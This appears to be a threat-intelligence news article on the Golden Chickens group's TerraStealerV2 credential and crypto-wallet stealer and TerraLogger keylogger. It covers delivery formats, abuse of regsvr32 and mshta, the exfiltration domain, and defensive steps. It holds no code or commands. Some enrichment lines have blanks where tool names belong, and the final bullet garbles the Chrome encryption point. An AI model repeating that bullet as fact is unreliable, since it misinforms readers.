Golden Chickens' Return: TerraStealerV2 and TerraLogger
Malware-Infected Golden Chickens Reemerge in 2025's Cybercriminal Onslaught, Equipped with Two Fresh Tools
Once again, infamous cybercriminal group Golden Chickens, also known as Venom Spider, has surfaced. Their latest toys, TerraStealerV2 malware and TerraLogger, are designed to steal sensitive data and log keystrokes, threatening user security like never before.
These new tools are part of their expanding malware-as-a-service (MaaS) offerings and mark a calculated shift towards targeting browsers, crypto wallets, and user inputs with unprecedented aggression. The malware duo is disguised in various file types, such as EXEs, MSI, LNK, and OLE Control Extensions (OCX), making it hard to detect and easy to distribute.
TerraStealerV2: Data Thief Extraordinaire
TerraStealerV2 is on a mission to harvest sensitive information from browsers and cryptocurrency wallets. It scans for stored browser credentials, browses for saved logins, and mines browser extension data, potentially leading to crypto wallet theft if the extensions are used for asset management or trading. The malware is typically delivered via OCX payloads from shady domains, such as wetransfers[.io]. Post-download, it leverages legitimate Windows utilities like regsvr32.exe and mshta.exe to execute its payload while sneaking past security systems.
Though it makes an attempt to swipe Chrome login data, it falls short of bypassing newer Application Bound Encryption (ABE) protocols in Chrome post-July 2024, hinting at active development or simply outdated tactics. Stolen data is then transferred to Telegram channels and external servers, granting attackers real-time access to user activity.
TerraLogger: Constant Keystroke Companion
Unlike TerraStealerV2, TerraLogger follows a more straightforward yet equally dangerous path. It serves as a standalone keylogger, quietly recording every keystroke on the infected machine. From login credentials to personal conversations, this malware tracks it all. TerraLogger doesn't currently mingle with data transfer or interact with command-and-control (C2) servers, but its design suggests future integration into broader malware campaigns. Golden Chickens may choose to pair this keylogger with their other tools to create a formidable multi-stage infection chain. Despite its simplicity, TerraLogger remains a significant concern for browser security, especially when paired with data-exfiltration tools like TerraStealerV2.
Catching the Golden Chickens: Infection Methods
Golden Chickens is playing a sneaky game by using multiple file types to distribute their malware, making infections more likely. Popular delivery formats include EXEs, MSI, LNK, and OCX. This versatile approach dramatically increases the odds of infecting unsuspecting users, who unknowingly install the malware once it's executed. The use of well-known Windows utilities and Telegram for data transfer adds a cloak of secrecy, as messages can be easily customized or deleted at the attacker's discretion.
Impacts on Browser Security and Crypto Users
TerraStealerV2's emergence underscores the growing focus on browser-based attacks. As more users store credentials in browsers like Chrome or employ browser extensions to manage cryptocurrencies, a single infection could open the door to financial platforms, crypto wallets, or even corporate intranets. Meanwhile, the increased trend of crypto wallet theft through malware like TerraStealerV2 highlights the evolution of cybercrime. Data-stealing tools are becoming more customizable and tougher to detect. Though both TerraStealerV2 and TerraLogger are still considered works-in-progress, their current capabilities are already detrimental. As Golden Chickens continues to fine-tune these tools, we can expect increased stealth, deeper system penetration, and broader targeting.
Ongoing Threat and Future Risks
The ongoing evolution of cybercriminal tools illustrates that many actors are developing innovative techniques. While TerraLogger restricts itself as a simple keylogger, it may function alongside TerraStealerV2, the rest of the Golden Chickens toolkit, or within a broader multi-stage threat in the future. With escalating reports of browser vulnerabilities and stolen crypto wallets, it's crucial to remain vigilant, track downloads, minimize the use of insecure software, and ensure browsers are up-to-date with the latest security protocols. Anticipate constant modification and evolution in the TerraStealerV2 and TerraLogger saga.
Enrichment Data:
- TerraStealerV2 uses multi-format attacks, primarily EXEs, DLLs, MSI, and LNK files with an OCX payload retrieved from "wetransfers.io".
- It bypasses security systems by exploiting trusted utilities like and , collects data, and sends it to Telegram and "wetransfers.io" after compression.
Protect yourself by:1. Updating browsers: Ensure they have adequate Application Bound Encryption (ABE) protections in place.2. Blocking suspicious domains: Disallow traffic to "wetransfers.io" and associated infrastructure.3. Restricting script execution: Set policies to limit the misuse of and via application allowlisting.4. Monitoring for keyloggers: Use endpoint detection tools to spot keyboard hooks, like those employed by TerraLogger.5. Implementing multi-factor authentication (MFA): This mitigates the impact of stolen credentials.6. Regularly auditing wallet directories: Check for unauthorized access, modifications, or unusual activity.
For organizations, prioritize behavioral analysis over signature-based detection due to the use of living-off-the-land binaries (LOLBins).
- The infamous cybercriminal group Golden Chickens, also known as Venom Spider, has introduced two new tools, TerraStealerV2 and TerraLogger, both designed to steal sensitive data and threaten user security.
- TerraStealerV2 is a data thief that targets browsers and crypto wallets, scanning for stored credentials, browsing for saved logins, and mining browser extension data.
- TerraLogger, on the other hand, functions as a keylogger, recording every keystroke on infected machines, potentially compromising login credentials and personal conversations.
- Golden Chickens uses multiple file types, such as EXEs, MSI, LNK, and OCX, to distribute their malware, increasing the chances of infection.
- To protect oneself, it is recommended to update browsers with Application Bound Encryption (ABE) protections, block suspicious domains like wetransfers[.io], restrict script execution, monitor for keyloggers, implement multi-factor authentication (MFA), and regularly audit wallet directories.
- In 2024, Telegram channels and external servers will no longer be effective for TerraStealerV2 to swipe Chrome login data due to the implementation of newer Application Bound Encryption (ABE) protocols in Chrome post-July 2024. However, it is expected that the cybercriminal group will continue to evolve their tools, increasing stealth, system penetration, and targeting a broader range of users.
